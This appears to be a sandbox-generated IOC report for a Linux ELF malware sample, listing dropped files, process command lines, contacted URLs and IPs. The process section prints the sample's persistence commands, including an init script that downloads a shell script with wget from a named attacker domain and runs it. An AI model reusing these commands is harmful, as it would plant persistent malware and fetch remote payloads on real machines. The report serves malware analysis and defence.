IOC Report
x86_64.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
x86_64.nn.elf
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/x86_64.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.gkcdoXte3H /tmp/tmp.ZovgPejUCK /tmp/tmp.AO1EzK0HHw
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.gkcdoXte3H /tmp/tmp.ZovgPejUCK /tmp/tmp.AO1EzK0HHw
/tmp/x86_64.nn.elf
/tmp/x86_64.nn.elf
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf"
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/x86_64.nn.elf
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf
/tmp/x86_64.nn.elf
-
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 28 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pen.gorillafirewall.su/lol.sh
unknown
http://pen.gorillafirewall.su/
unknown

IPs

IP
Domain
Country
Malicious
154.216.17.220
unknown
Seychelles
malicious
91.92.246.113
unknown
Bulgaria
malicious
93.123.85.166
unknown
Bulgaria
malicious
54.171.230.55
unknown
United States
45.202.35.64
unknown
Seychelles
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
413000
page execute read
 malicious
1a1f000
page read and write
516000
page read and write
514000
page read and write
7ffd0cf77000
page execute read
7ffd0cf30000
page read and write